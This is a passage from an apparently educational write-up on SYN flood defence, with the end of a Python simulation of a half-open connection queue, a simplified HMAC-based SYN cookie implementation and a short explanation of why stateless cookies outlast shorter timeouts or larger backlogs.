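            q.ack(legit, now)                    # a real client completes the handshake
        outcomes.append(ok)
    return outcomes

# SYN cookies: no state at all. The initial sequence number is a keyed hash of the
# 4-tuple and a coarse timestamp; a returning ACK of ISN+1 proves the client address is
# reachable. Simplified: real cookies also pack the negotiated MSS into the low bits.
def syn_cookie(secret, client, server, minute):
    msg = ("%s:%d|%s:%d|%d" % (client + server + (minute,))).encode()
    return int.from_bytes(hmac.new(secret, msg, hashlib.sha256).digest()[:4], "big")

def accept_ack(secret, client, server, ack, minute):
    """Accept cookies minted this minute or the previous one; anything else is forged or stale."""
    for m in (minute, minute - 1):
        if (syn_cookie(secret, client, server, m) + 1) & 0xFFFFFFFF == ack:
            return True
    return False

if __name__ == "__main__":
    print("ttl 180s, flood every 180s -> client ever connects:", any(run_scenario()))
    print("ttl 60s,  flood every 180s -> client ever connects:", any(run_scenario(ttl=60)))
    secret, c, s = b"constructed-secret", ("192.0.2.7", 50000), ("198.51.100.1", 80)
    isn = syn_cookie(secret, c, s, 1000)
    print("genuine ACK accepted:", accept_ack(secret, c, s, (isn + 1) & 0xFFFFFFFF, 1000))
    print("forged ACK accepted :", accept_ack(secret, c, s, 12345, 1000))
```

The scenario also shows the defender's crude option before cookies existed, a shorter half-open timeout or a bigger backlog, only raises the attacker's packet rate; the cookie server has no table to fill, so the spoofed SYNs cost it nothing but a hash per packet.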